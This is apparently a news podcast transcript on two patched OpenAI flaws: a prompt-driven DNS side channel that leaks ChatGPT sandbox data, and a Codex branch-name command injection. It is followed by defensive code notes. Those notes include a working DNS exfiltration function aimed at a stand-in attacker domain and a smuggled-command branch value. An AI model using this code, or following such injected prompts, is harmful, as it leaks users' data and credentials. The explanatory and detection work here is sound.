[00:00] Announcer: From Neural Newscast, this is Model Behavior, AI-focused news and analysis on the models shaping our world.
[00:11] Nina Park: I'm Nina Park.
[00:13] Nina Park: Welcome to Model Behavior, where we examine how AI systems are built, deployed, and operated in professional environments.
[00:21] Thatcher Collins: I'm Thatcher Collins.
[00:22] Thatcher Collins: Today we're reviewing a series of security patches from OpenAI, addressing vulnerabilities that could have permitted covert data exfiltration and credential theft.
[00:32] Nina Park: The Hacker News is reporting on research from Check Point regarding ChatGPT's Linux runtime environment.
[00:38] Nina Park: Thatcher, it appears a vulnerability allowed sensitive conversation data to be exfiltrated through a hidden DNS-based side channel.
[00:46] Thatcher Collins: That's correct, Nina.
[00:48] Thatcher Collins: The fundamental issue is that the AI's code execution environment assumed a level of isolation that was not fully realized.
[00:56] Thatcher Collins: A malicious prompt could have the sandbox encode data into DNS requests, bypassing the standard guardrails designed to prevent outbound network traffic.
[01:04] Nina Park: Check Point noted that this could leak messages or uploaded files without any user warning.
[01:10] Nina Park: OpenAI patched the specific issue on February 20th, and notably, there's no evidence it was exploited in the wild.
[01:18] Thatcher Collins: It raises questions about why the native security controls didn't flag the behavior.
[01:23] Thatcher Collins: If the system doesn't recognize a DNS request as a potential data transfer, it won't trigger a confirmation dialog, leaving a significant blind spot.
[01:33] Nina Park: We also have news regarding OpenAI Codex.
[01:37] Nina Park: BeyondTrust discovered a command injection vulnerability where an attacker could smuggle commands through a GitHub branch name parameter.
[01:45] Thatcher Collins: Nina, this is particularly concerning for developers.
[01:48] Thatcher Collins: That injection could lead to the theft of GitHub agent access tokens, potentially giving an attacker read and write access to a victim's entire codebase.
[01:57] Nina Park: OpenAI patched that Codex flaw earlier, on February 5th.
[02:02] Nina Park: Together, these two cases suggest that as AI agents gain more privileged access to enterprise systems, the attack surface is expanding rapidly.
[02:11] Thatcher Collins: Exactly. The takeaway here is that organizations shouldn't assume AI tools are secure by default.
[02:18] Thatcher Collins: There needs to be a layered approach to security architecture that treats AI inputs with the same rigor as any other application boundary.
[02:26] Nina Park: Thank you for listening to Model Behavior, a Neural Newscast editorial segment.
[02:31] Nina Park: For more details on these findings, visit mb.neuralnewscast.com.
[02:37] Nina Park: Neural Newscast is AI-assisted, human-reviewed.
[02:42] Nina Park: View our AI transparency policy at neuralnewscast.com.
[02:47] Announcer: This has been Model Behavior on Neural Newscast.
[02:50] Announcer: Examining the systems behind the story.
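
Segment notes:

To make the DNS side channel discussed at [00:38]-[01:01] concrete, here is a minimal sketch of the general exfiltration pattern, not Check Point's actual proof of concept. The attacker-controlled domain, the base32 encoding, and the chunk sizes are all illustrative assumptions; the point is only that ordinary name lookups can carry data to whoever runs the domain's authoritative name server, even when direct outbound HTTP is blocked.

```
# Minimal sketch of DNS-based data exfiltration, for illustration only.
# exfil.example.com is a hypothetical attacker-controlled domain.
import base64
import socket

ATTACKER_DOMAIN = "exfil.example.com"  # attacker runs its authoritative NS
MAX_LABEL = 63                         # DNS limits each label to 63 bytes

def exfiltrate(secret: str) -> None:
    """Encode data into DNS labels and leak it via ordinary lookups.

    Each lookup for <seq>.<chunk>.exfil.example.com reaches the
    attacker's name server carrying one chunk of the secret.
    """
    # Base32, lowercased and unpadded, keeps every label DNS-safe.
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    for seq, chunk in enumerate(chunks):
        hostname = f"{seq}.{chunk}.{ATTACKER_DOMAIN}"
        try:
            socket.gethostbyname(hostname)  # the query itself is the channel
        except socket.gaierror:
            pass  # NXDOMAIN is fine; the attacker already logged the query
```

Nothing here needs the lookup to succeed, which is why guardrails focused on blocking response traffic miss it.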
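
On Thatcher's point at [01:23] about the blind spot: a monitoring layer that treats DNS as a potential data channel can flag tunnelling-shaped queries. The heuristic below is a sketch with assumed thresholds, not tuned values, and the "ignore the last two labels" rule is a naive stand-in for proper registrable-domain parsing.

```
# Sketch of an egress heuristic for spotting DNS tunnelling: flag
# lookups whose labels are unusually long or high-entropy.
import math
from collections import Counter

def label_entropy(label: str) -> float:
    """Shannon entropy of a DNS label, in bits per character."""
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_tunnelling(hostname: str) -> bool:
    # Naively ignore the last two labels (registrable domain + TLD).
    labels = hostname.rstrip(".").split(".")[:-2]
    return any(
        len(label) > 40 or (len(label) >= 16 and label_entropy(label) > 3.5)
        for label in labels
    )

print(looks_like_tunnelling("api.github.com"))                        # False
print(looks_like_tunnelling("0.gezdgnbvgy3tqojq.exfil.example.com"))  # True
```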
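
For the Codex finding at [01:37], the segment doesn't describe the internals, so the sketch below illustrates the general vulnerability class BeyondTrust's report falls into rather than Codex's actual code: splicing an untrusted branch name into a shell command string, versus passing it as a literal argument. The payload string is a harmless hypothetical.

```
# Sketch of the command-injection class, not Codex's actual implementation.
import subprocess

# The attacker controls the branch name (e.g., in a pull request they open).
branch = "main; echo INJECTED"  # hypothetical payload; a real one could steal tokens

# Vulnerable pattern: interpolating the untrusted name into a shell string.
# The `;` terminates the git command and the shell runs the attacker's payload.
subprocess.run(f"git checkout {branch}", shell=True)

# Safer pattern: pass argv as a list with shell=False (the default).
# The whole string is a single literal argument, `;` has no special meaning,
# and the checkout simply fails on a nonexistent branch name.
subprocess.run(["git", "checkout", branch])
```

Note that the list form alone does not stop a name beginning with "-" from being parsed as a git option; that is what boundary validation, sketched next, addresses.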
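
On the closing point at [02:18] about treating AI inputs like any other application boundary: a minimal validation sketch. The allowlist is an assumption, deliberately tighter than git's real ref rules (see `git check-ref-format`), on the theory that tighter is safer at an AI/tool boundary.

```
# Sketch of boundary validation for an untrusted branch name.
import re

# First character may not be "-", blocking option-style injection;
# the rest is restricted to a conservative safe set.
_SAFE_BRANCH = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,200}")

def require_safe_branch(name: str) -> str:
    """Reject names containing shell metacharacters or option-like prefixes."""
    if not _SAFE_BRANCH.fullmatch(name):
        raise ValueError(f"refusing suspicious branch name: {name!r}")
    return name

if __name__ == "__main__":
    print(require_safe_branch("feature/login-fix"))  # passes
    try:
        require_safe_branch("main; echo INJECTED")   # rejected
    except ValueError as err:
        print(err)
```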